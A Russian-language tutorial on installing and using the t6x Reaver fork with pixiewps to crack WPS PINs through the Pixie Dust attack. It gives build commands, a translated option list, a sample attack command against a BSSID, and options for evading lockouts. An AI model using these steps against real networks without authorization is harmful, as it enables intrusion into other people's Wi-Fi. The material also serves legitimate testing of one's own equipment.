Модификация форка Reaver — t6x

Модификация форка Reaver — t6x

https://t.me/Torchik_Ru

Доброго времени суток, господа. Сегодня на повеске дня, как и обещалось - статья про атаку Pixie Dust. Так-же мы более глубоко рассмотрим Reaver как инструмент.

When poor design meets poor implementation.
Когда убогий дизайн встречается с убогой реализацией.
(это не про форки Reaver, это про WPS)

Что такое Reaver

Reaver предназначен для подборки пина WPS (Wifi Protected Setup) методом перебора. Reaver создан для надёжной и практичной атаки на WPS, он прошёл тестирование на большом количестве точек доступа с разными реализациями WPS. В среднем, Reaver раскрывает пароль WPA/WPA2 в виде простого текста целевой точки доступа (ТД) за 4-10 часов, в зависимости от ТД. На практике, ему обычно нужна половина этого времени на предположение пина WPS и разгадки пароля. Веб-сайт оригинальной версии — https://code.google.com/p/reaver-wps/. Там ещё есть Pro версия.

Форки Reaver

Т.к. оригинальная версия Reaver не обновлялась с января 2012 года, то был сделан форк. Сайт форка — https://code.google.com/p/reaver-wps-fork/. Последние изменения в форке датируются январём 2014 года. Жизнь не стоит на месте. И совсем недавно (в апреле 2015 года) была официально выпущена модифицированная версия форка Reaver. Сайт этой модификации — https://github.com/t6x/reaver-wps-fork-t6x. Главное её отличие в том, что она может использовать атаку Pixie Dust для нахождения верного пина WPS. Эта атака применима ко многим точкам доступа Ralink, Broadcom и Realtek.

Атака, используемая для этой версии, разработана Wiire.

Для установки модифицированной версии Reaver, нам нужно установить Pixiewps. Это нужно сделать всем, кроме пользователей Kali Linux: расслабьтесь, ребята, у нас уже всё есть.

Установка Pixiewps на Kali Linux

Всё необходимые пакеты уже скопилированы и доступны в репозиториях. Для их установки достаточно набрать:

apt-get libpcap-dev pixiewps

Установка Pixiewps на Debian, Mint, Ubuntu

Ставим зависимости Pixiewps:

sudo apt-get install libssl-dev

Переходим на официальный сайт.

Скачиваем zip-архив — для этого нажимаем кнопку Download ZIP.

cd Downloads
unzip pixiewps-master.zip
cd pixiewps-master/src
make
gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
make install
Вывод после последней команды:
install -D pixiewps /usr/local/bin/pixiewps
install -m 755 pixiewps /usr/local/bin

Установка модификации форка Reaver — t6x на Kali Linux

Ещё раз повторю, у пользователей Kali Linux эта версия, а также все зависимости для этой программы идут "из коробки". Им не нужно ничего дополнительно устанавливать.

Установка модификации форка Reaver — t6x на Debian, Mint, Ubuntu

Библиотеки для Reaver:

apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps

Если пакет Pixiewps by Wiire не найден, то вернитесь к предыдущему шагу, где описано как его установить.

Компиляция и установка Reaver

Загрузка:

git clone https://github.com/t6x/reaver-wps-fork-t6x

Или так:

wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip

Сборка:

cd reaver-wps-fork-t6x*/
cd src/
./configure
make

Установка:

sudo make install

Использование Reaver

Использованию Reaver будет посвящена отдельная статья, а пока только несколько основных моментов. Запускается модифицированная версия Reaver точно также, как и форк. Чтобы убедиться, что модификация у вас успешно запустилась, наберите в командной строке:

reaver -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Кроме версии, появится также и информация о модификации:

Обязательные аргументы:

-i, --interface=<wlan> Имя сетевого интерфейса для использования
-b, --bssid=<mac> BSSID точки доступа

Опциональные аргументы:

-m, --mac=<mac> MAC хостовой системы
-e, --essid=<ssid> ESSID целевой ТД
-c, --channel=<channel> Установить канал (подразумевает -f)
-o, --out-file=<file> Установить вывод в лог-файл [stdout]
-s, --session=<file> Восстановить файл предыдущей сессии
-C, --exec=<command> Выполнить данную команду после успешного подбора пина
-D, --daemonize Перевод reaver в режим демона
-a, --auto Автоматически определит
-f, --fixed Отключить прыгание по каналам
-5, --5ghz Использовать каналы 5GHz 802.11
-v, --verbose Отображать некритические предупреждения (-vv чтобы увидеть больше)
-q, --quiet Отображать только критические предупреждения
-K --pixie-dust=<номер> [1] Запускает pixiewps с PKE, PKR, E-Hash1, E-Hash2, E-Nonce и Authkey (Ralink, Broadcom, Realtek)
-Z, --no-auto-pass НЕ запускать reaver для автоматического получения пароля WPA, если атака pixiewps прошла успешно
-h, --help Показать справку

Продвинутые опции:

-p, --pin=<wps pin> Использовать заданный 4 или 8 цифровой WPS пин
-d, --delay=<секунды> Установить задержку между попытками пина [1]
-l, --lock-delay=<seconds> Установить время ожидания, если заблокировала попытки вода пина [60]
-g, --max-attempts=<номер> Выйти после числа попыток пина
-x, --fail-wait=<секунды> Установить время для неожиданных неудач [0]
-r, --recurring-delay=<x:y> Делать паузу на y секунд каждые x попыток пина
-t, --timeout=<секунды> Установить пиреод таймаута получения [5]
-T, --m57-timeout=<секунды> Установить период таймаута M5/M7 [0.20]
-A, --no-associate Не связываться с ТД (связь должна быть сделана другим приложением)
-N, --no-nacks Не отправлять сообщения NACK когда получены пакеты о неисправности
-S, --dh-small Использовать малые DH ключи для ускорения скорости взлома
-L, --ignore-locks Игнорировать заблокированные полученные от целевой ТД
-E, --eap-terminate Завершать каждую сессию WPS пакетом EAP FAIL
-n, --nack Целевая ТД всегда шлёт пакеты NACK [Auto]
-w, --win7 Мимикрировать под Windows 7 registrar [False]
-X, --exhaustive Установить исчерпывающий режим с начала сессии [False]
-1, --p1-index Установить начальный индекс массива для первой половины пина [False]
-2, --p2-index Установить начальный индекс массива для второй половины пина [False]
-P, --pixiedust-loop Установка в режим PixieLoop (не отправляет M4 и делает петлю на M3) [False]
-W, --generate-pin Генерация дефолтных пинов от команды devttys0 [1] Belkin [2] D-Link
-H, --pixiedust-log Включить логирование завершённых PixieHashes

Пример использования:

reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1

Опция -K // —pixie-dust в reaver

Опция -K 1 запускает pixiewps с PKE, PKR, E-Hash1, E-Hash2, E-Nonce и Authkey. pixiewps будет пытаться атаковать Ralink, Broadcom и Realtek.

Особая заметка: если вы атакуете ТД Realtek, НЕ используйте маленькие ключи DH (-S)

Опция -H // —pixiedust-log в reaver

Опция -H — это переключатель включения логирования PixieHashes, сохранённые хеши будут размещены в директории запуска. Эта опция требует включения хотя бы -vvv, и, соответственно, работает с -K 1 & -P.

Имена сохранённых файлов соответствуют bssid (MAC) цели и имеют расширение .pixie. Внутри этих сохранённых логов вы найдёте все требуемые хеши PixieDust, а также готовые для копипасты полные команды для использованиях их в программе pixiewps. Также есть возможность выполнить их. Просто закиньте этот файл в ваш любимый шелл и выполните его (может понадобиться chmod +x <имя_файла>).

Оция -P // —pixiedust-loop в reaver

Опция (-P) в reaver переводит reaver в циклический режим, который не распространяется на сообщения M4 протокола WPS, которые, надеемся, избегают блокировки. Это распространяется ТОЛЬКО на сборы PixieHash, который используются с pixiewps, НЕ с «онлайн» брутфорсингом пинов.

Эта опция была сделана в целях:

  • Сбора повторяющихся хешей для дальнейших сравнений и анализов / изучения новых уязвимостей чипсетов, роутеров и т.д.
  • Атак чувствительных ко времени, где сбор хешей продолжается постоянно пока ваши временные рамки не закончатся.
  • Для целей скриптинга тех, кто хочет использовать возможный способпредотвращения блокировки PixieHash, ведущей сбор для вашего пользовательского сценария.

Report Page